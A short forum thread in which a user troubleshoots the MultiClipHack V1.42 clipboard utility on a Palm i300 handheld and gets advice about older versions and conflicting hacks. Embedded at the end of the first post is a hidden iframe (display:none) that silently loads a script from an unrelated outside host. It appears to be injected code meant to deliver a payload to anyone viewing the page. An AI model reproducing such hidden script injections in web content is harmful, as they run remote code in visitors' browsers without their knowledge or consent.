+ Reply to Thread

MultiClipHack V1.42

MultiClipHack V1.42 looks like a great product, and it costs only $5.00! Unfortunately, it doesn't seem to work on my i300. I've written to customer support, but haven't received an answer yet.

Is anyone else using this hack? Does it work for you?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Richard

1.23 at least works fine on the I-300. Try using your hack manager to inactivate any other hacks one-by-one until you find the culprit.

It was hard, but I finally found an old version 1.23 and loaded it on my I300. Unfortunately, I didn't have any better luck with v1.23 than I'd had with v1.42.

I also tried disabling all my other hacks one at a time, as suggested, but it didn't help. I'm now wondering if I have to register the software before it will work. I'd gladly pay the $5.00, if I could be sure that the program will function correctly.

Another possibility is that I'm not using the program correctly. I've tried copying and pasting over and over again, but I never see a MultiClipHack menu anywhere.

Any more ideas?
    Richard